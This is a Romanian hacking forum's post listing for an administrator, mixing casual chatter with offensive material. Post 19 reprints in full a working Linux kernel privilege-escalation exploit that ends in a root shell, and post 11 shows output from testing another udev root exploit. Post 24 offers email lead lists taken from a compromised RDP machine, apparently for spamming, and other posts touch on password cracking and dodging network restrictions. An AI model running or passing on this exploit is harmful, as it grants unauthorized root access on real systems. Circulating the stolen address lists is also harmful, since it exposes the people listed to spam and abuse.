Jump to content

Zatarra

Administrators
  • Posts

    2651
  • Joined

  • Last visited

  • Days Won

    92

Everything posted by Zatarra

  1. De cand sunt script kiddies hackeri? Noroc ca imi plac brunetele ca daca nu..
  2. Am doar un 2.6.18-194.el5PAE. Cand am 164 revin cu edit ca de obicei . Mersi fain.
  3. As dori sa nu mai IQ-ul atat de jos si sa incepi sa gandesti si tu..
  4. Nu depinde de tine, depinde de serviciul care il folosesti. E foarte simplu.. ai acces la serviciu -> ai acces la numar, alta solutine nu cred sa existe.
  5. Ii ceva asemanator cu ETC-ul. Tare.. ;-) oricum daca nu ma insel anul asta trebuie sa te ocupi mai mult de semnale si sisteme
  6. @cigraphics: Buc, Tm sau Cj?
  7. Frate nu mai redeschide topicuri vechi ar trebui sa primesti un warn si un lock la topic BTW: De ce sa platesti cand poti sa le gasesti pe net gratis. EDIT pentru postul lui begood de mai jos: print "Hai cu mata ca o sa ai un server\n\n"; Viens avec une natte que vous avez un serveur print "[*] Ma pis pa el root\n"; Pa lui pisse root print "[*] Sloboz...\n"; Sloboz? print "[*] Hopa tinere\n"; Attention les jeunes print "[*] Si hai cu mata!rupel\n\n"; Et je pars avec vous! Rupel print "[semnat] mozi\n\n"; [signé] Mozi Mor de ras
  8. Altii au inceput de 1 sapt . Si da, ai dreptate, daca nu ai restante esti degeaba in facultate
  9. Reupload? daca se poate bineinteles
  10. Frate daca taceai filozof ramaneai. On: Daca am sta sa ne gandim cat fura altii nici nu am baga in seama ce a facut el.
  11. Eram sigur ca iese saptamanile astea pentru 10.10 Cu toate ca sunt la McDonald fac proba repede pe un 10.04 si revin cu edit Edit: ./a.sh: 21: cannot create /dev/.udev/rules.d/root.rules: Permission denied All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.) Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root proba@nasa.gov ~ $ mountall Command 'mountall' is available in '/sbin/mountall' The command could not be located because '/sbin' is not included in the PATH environment variable. This is most likely caused by the lack of administrative priviledges associated with your user account. mountall: command not found proba@nasa.gov ~ $ /sbin/mountall mountall: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: Connection is closed mountall: swapon /dev/disk/by-uuid/1b414176-f0db-4028-be34-2829dab20f02 [1919]: No such file or directory Kernel version : 2.6.32-24-generic Deocamdata atat.. voi reveni cu reedit mai pe seara sau cel tarziu maine
  12. Mersi fain begood.. let's ncrack some shits
  13. Zatarra

    :)

    "CERERI [numai aici] Sectiunea cereri este doar pentru membrii cu minim 10 posturi ! Aici poti cere programe / tutoriale" Privatizeaz-o mai subtil in alta parte si ofera mai multe detali, gen : dau la schimb.. sau ofer.. sau ajut la.. tu stii mai bine, altel nu cred ca vei avea vreo sansa sa primesti ceva.
  14. Si eu as vrea sa fac CISCO in TM dar din cate am auzit este vre`o 2000 si ceva de RON deci.. deocamdata stau pe tusa. Cat despre faptul daca se merita sau nu.. eu unul cred ca se merita, pe langa faptul ca inveti o groaza despre retele te ajuta foarte mult cand il precizezi intr-un CV. Rog pe careva daca are informatii despre CISCO in Timisoara sau care a urmat cursul in TM sa mai precizeze ceva detalii si cum putem afla mai multe. Ms anticipat.
  15. Ambele. Pt linux stiu 2 dar mai am 1, iar pt windows stiu 1 si mai am tot 1 As putea face rost si de al doilea de linux, daca dau un search prin turnul cu CD`uri, dar nu prea vad rostul.
  16. Feedback: L`am probat si e slab rau. Deschide foarte multe ferestre si manca destule resurse. In + astepti o vesnicie pana le verifica pe toate. Poate pe viitor voi face o proba cu un user si o parola presetata. Pana atunci raman la ce am eu . Ms oricum
  17. Zatarra

    Cerere!

    On: Frate lasa conquiztador.. ala e un site de incultura generala cu o groaza de intrebari eronate si stupide. Pune mana si citeste o carte daca vrei sa te "cultivi". Off: Riscam sa pierdem jumate din userii "importanti"
  18. Cripteaza si tu cu ROT13.. hackereii nu au auzit de asa ceva.. Atat metoda de cryptare cat si de decryptare e banala
  19. Vad ca nu l`ai pus sus.. deci il pun eu Tineti minte acesta este un POC!!! * exploit for x86_64 linux kernel ia32syscall emulation (again) * rediscovered by ben hawkes * with help from robert swiecki and tavis ormandy * * original vulnerability discovered by Wojciech Purczynski * * original exploit by * Robert Swiecki <robert_at_swiecki.net> * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl> * Pawel Pisarczyk <pawel_at_immos.com.pl> * * kernel priv escalation code borrowed from spender * */ #include <sys/types.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <string.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int kernelmodecode(void *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %s\n", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } static void docall(uint64_t *ptr, uint64_t size) { commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("symbol table not available, aborting!\n"); exit(1); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("symbol table not available, aborting!\n"); exit(1); } uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); printf("mapping at %lx\n", tmp); if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } for (; (uint64_t) ptr < (tmp + size); ptr++) *ptr = (uint64_t)kernelmodecode; __asm__("\n" "\tmovq $0x101, %rax\n" "\tint $0x80\n"); printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); execl("/bin/sh", "bin/sh", NULL); printf("no /bin/sh ??\n"); exit(0); } int main(int argc, char **argv) { int pid, status, set = 0; uint64_t rax; uint64_t kern_s = 0xffffffff80000000; uint64_t kern_e = 0xffffffff84000000; uint64_t off = 0x0000000800000101 * 8; if (argc == 4) { docall((uint64_t*)(kern_s + off), kern_e - kern_s); exit(0); } if ((pid = fork()) == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execl(argv[0], argv[0], "2", "3", "4", NULL); perror("exec fault"); exit(1); } if (pid == -1) { printf("fork fault\n"); exit(1); } for ( { if (wait(&status) != pid) continue; if (WIFEXITED(status)) { printf("Process finished\n"); break; } if (!WIFSTOPPED(status)) continue; if (WSTOPSIG(status) != SIGTRAP) { printf("Process received signal: %d\n", WSTOPSIG(status)); break; } rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); if (rax == 0x000000000101) { if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { printf("PTRACE_POKEUSER fault\n"); exit(1); } set = 1; //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); } if ((rax == 11) && set) { ptrace(PTRACE_DETACH, pid, 0, 0); for( sleep(10000); } if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { printf("PTRACE_SYSCALL fault\n"); exit(1); } } return 0; }
  20. Mersi. O sa`l probez mai pe seara si revin cu edit. Din cate vad eu iti trebuie si un pass_file.
  21. Vorbeste frate cu un prieten ceva si spunei sa-ti tina el serverul, nu cred ca ar fi un sacrificiu chiar asa mare. Zici ca tu deti date de la FBI, CIA, NSA si multe alte organizatii "mondene" ca sa ai backup plan pentru alimentare.. Off: Frate pe cuvant ca asta e topicul zilei
  22. Mersi fain frate.. Numa bine am aflat ca merge Team Viewer si pt Linux P.S. Daca are cineva idee cum as putea sa fac ssh tunneling in Ubuntu 10.04 sa imi dea un PM. Ms anticipat P.P.S. Tin sa precizez ca vreau sa trec de restictiile din camin si ca am servere externe cu 443 pentru ssh-tunneling.
  23. Sunt puse in caz ca nu vezi Edit: Deja au fost si downloadate de cateva ori acum totul depinde de viteza
  24. Am intrat intr`un RDP mai vechi si am dat peste mailul unui hackerel. Sunt vre`o 30 de liste de mail-uri, dar cred ca sunt spamate deja. In schimb am ceva relativ fresh pt voi. Gasiti aici: emails 1 txt the leadsss txt P.S. Primul venit primul servit Pace
  25. Salut. Ce crezi tu ca facem noi pe aici?
×
×
  • Create New...